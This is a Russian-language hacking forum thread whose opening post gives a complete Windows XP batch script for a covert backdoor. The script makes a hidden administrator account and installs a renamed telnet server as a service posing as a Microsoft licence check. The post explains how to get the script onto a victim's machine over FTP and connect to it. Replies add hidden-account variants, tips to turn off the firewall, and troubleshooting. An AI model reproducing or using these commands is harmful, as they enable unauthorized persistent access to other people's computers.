|
Скрытый telnet доступ к Windows
Скрытый telnet доступ к Windows
]INTRO[ Данная статья предназначена для пользователей умеющих пользоваться консолью и знающих о telnet'е. Всё приведйнное ниже тестилось на машинах под управлением операционной системы Windows XP SP2. ]MENU[ 1,2. Для тех, кто имеет доступ к машине. 2. Для впаривающих. 3. Развязка ]START[ 1. Нам нужно паписать батник, в котором прописываются все параметры будущего телнета. Вот собсно и он, run.bat (в архиве): chcp 1251 net user SUPPORT_388945a0 /delete net user SUPPORT_388945a0 pas /add net localgroup "Администраторы" SUPPORT_388945a0 /add net localgroup "Пользователи" SUPPORT_388945a0 /del copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" ECHO Windows Registry Editor Version 5.00>>user.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg regedit /s user.reg && DEL user.reg sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Проверка подлинности Microsoft Windows" error= ignore depend= RPCSS/TCPIP/NTLMSSP sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." tlntadmn config port=1451 sec=-NTLM net start "Проверка подлинности Microsoft Windows" Расшифровываю: chcp 1251 - переходим на 1251 кодировку, без этого не как, иначе нужно будет перекодировать в досовскую кодировку, например группа "Администраторы" будет такова "Ђ¤¬Ё*Ёбва*в®ал". net user SUPPORT_388945a0 /delete - удаляем стандартного скрытого юзверя. net user SUPPORT_388945a0 pas /add - добавляем его-же, только каплю подделаем его под себя. pas - вместо этого нужно ввести пароль. net localgroup "Администраторы" SUPPORT_388945a0 /add - добавляем юзверя SUPPORT_388945a0 в группу "Администраторы". net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах). copy /y "%SYSTEMROOT%/system32\tlntsvr.exe" "%SYSTEMROOT%/system32\tlntsevr.exe" - Берёт стандартный файл сервера tlntsvr.exe, копирует его в ту же директорию, только уже под другим именем (tlntsevr.exe). ECHO Windows Registry Editor Version 5.00>>user.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]>>user.reg ECHO "SUPPORT_388945a0"=dword:00000000>>user.reg regedit /s user.reg && DEL user.reg - изменение реестра, сначала воспроизводится написанное, за тем импортируется в реестр. SUPPORT_388945a0 - данный юзверь сдесь скрывается от посторонних глаз, т.е. не будет отображаться во время входа в систему, при просмотре пользователей через панель управления и т.д. (конец в ветке "UserList" без пробелов! почему-то исправляется...). sc create "Microsoft Network" binpath= %windir%\system32\tlntsevr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP - создаём службу, %windir%\system32\tlntsevr.exe - путь до файла сервера телнета, "Проверка подлинности Microsoft Windows" - название службы. sc description "Microsoft Network" "Удостоверяет, что ваш компьютер использует лицензионное программное обеспечение." - её описание. tlntadmn config port=1451 sec=-NTLM - порт 1451 net start "Проверка подлинности Microsoft Windows" - старт службы 2. Вот мы зашли на машину через некий telnet или его подобие, переходим в любую директорию. На своей машине запускаем ftp сервер, например Pablos ftp server (в архиве), переходим во вкладку User Accounts, там всё интуетивно понятно, указываем дынные для конекта. В консили переходим в нужную директорию, за тем пишем: ------------ Способ 1. ------------ ftp open 111.111.111.111 SUPPORT_388945a0 pas get run.bat bye "run.bat" ftp - угадайте что :) open 111.111.111.111 - открыть ип 111.111.111.111 (ваш ип). SUPPORT_388945a0 - логин пользователя. pas - пароль. get run.bat - отправить наш батник. bye - выйти из ftp "run.bat" - запустить батник (при нужде вводим путь). ------------ Способ 2. Тут нам вообще не нужен ftp и вообще на много меньше мороки, но всеравно, попробуйте и первым способом. ------------ Копируем код батника, маус 2 в консоли, волшебный пункт "Вставить" (у кого-то Past :)), жмём Enter и всё)) Ну да, да...очень сложно... но первый способ всеравно попробуйте)) 3. Ну и самое интересное и долгожданное: Вводим в консоль: telnet 222.222.222.222 1451 222.222.222.222 - ип жертвы 1451 - порт Хотя зачем это разъяснять, если вы умееть пользоваться телнетом, но вдруг кто-то уже забыл). Что бы создать .exe юзаем программу "Bat To Exe Converter" (в архиве). Архив к статье: http://depositfiles.com/files/7783083 (537.94Kb). п.с. подобная статья на этой ветке от StG-44 с его взглядом на телнет http://forum.antichat.ru/thread68300.html |
Цитата:
В целом норм. |
Цитата:
|
>>>net localgroup "Пользователи" SUPPORT_388945a0 /del - удаляем узверя SUPPORT_388945a0 из группы "Пользователи" (когда мы создали пользователя он присвоил себе группу пользователей, а когда мы присвоили ему группу админов, он просто стал учавствовать в обеих группах).
Вообще глупое действие |
Вы что, вообще охр**ели? Уже удалили 3 подобных статьи от Giviona (линк ниже)
Называется, найдите 10 отличий - http://www.hackzona.ru/hz.php?name=News&file=article&sid=8820 |
Цитата:
|
Цитата:
|
мля писалось 100 раз
но мне очень нравиться такие статьи подробные! Сам такие примерно пишу на досуге. Респект вообщем) Добавляю Скрытые пользователи храняться тут...... (там все юзеры и админы +еще и скрытые) C:\WINDOWS\system32\lusrmgr.exe может кому понадобиться для всяких пакостей))) |
Цитата:
Во-вторых, это просто оснастка консоли управления, в ней самой ни черта не хранится. В-третьих, для сеанса telnet такое не подойдёт. |
хм..... я сам не знал что это не exe потому что лень смотреть но так все программы обладают exe =-)
Во вторых я имел ввиду что через нее можно все делать с юзерами (ПС вот че ты так придираешься?) В третих я разве чтото упоминал о телнете??? пздц какой то народ какой пошол |
Цитата:
|
Не палится как обычно запущенный телнет и т.д.
вообще не занимает канал обычного телнета |
|: netstat -an УУУУУХ ТЫ ПРюВЕТ ПОРТ ЧЕТЫРНАДЦАТЬПЕТДЕСЯТОДИН!! !11
зы: я только один прочитал это? подключение по телнету НЕ занимает канал обычного телнета :eek: а чей канал тогда занимает ftp ? :D зыы: а може это телепатнет? :eek: :confused: Код HTML:
telepatnet > open 192.168.0.1 1451 |
есть проблемка - доступ к удаленному компу есть.
поднял на нем телнет доступ. подрубаюсь спокойно к компу. тасклист могу смотреть. но не могу запустить ни одной проги. каждый раз пишет This program cannot be run in DOS mode. пробывал просто написать имя файла или через start - результат одинаков. хотя на удаленной машине стоит винда. |
Создай какой нить батник ) ну типа echo "start proga.exe" >> 1.bat , ну а потом запусти батник , мож прокатит
ЗЫ : Темы про батники уже достали... |
А если создать акк свой
net user pidor 123 /add net localgroup Administrators pidor /add и в реестр добавить в ветку HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t pidor dword:00000000 то будет беспалевно? Эту учетку админ не увидит? |
Цитата:
|
Цитата:
Почему? а где она видна будет? |
Win+R "control userpasswords2"
|
1) Не видно будет в Welcome-screen, через администрирование - ясен пень видно.
2) Не забудьте поставить "срок действия пароля не ограничен" (это для тех, кто собирается постоянно лазить на комп жертвы). 3) Также полезно отключить хотя бы базовый файерволл. |
зачем мучаться с созданием рег-файла и удалять его ?? не проще ли воспользоваться командой reg add?
|
Подскажите пожалуйста в хр всё описанное работает на ура, но на win2000 и 2003 напрочь не получается залогиниться, сбой подключения всегда
|
все робит спасиб
|
| Время: 06:40 |